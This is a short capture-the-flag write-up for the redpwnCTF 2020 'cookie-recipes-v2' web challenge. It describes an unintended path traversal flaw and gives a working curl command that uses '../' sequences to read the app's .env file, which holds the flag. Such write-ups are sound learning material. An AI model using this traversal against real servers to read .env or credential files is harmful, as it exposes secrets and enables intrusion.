Tags: path-traversal unintended web 

Rating: 3.7

We noticed the application uses `dotenv` to store the flag and also found a path traversal vulnerability (unintended by the author)

`dotenv` fetches values from a file called `.env`. So we can get the flag by fetching this file!

```
curl --path-as-is https://cookie-recipes-v2.2020.redpwnc.tf/../../../../../../../app/.env
```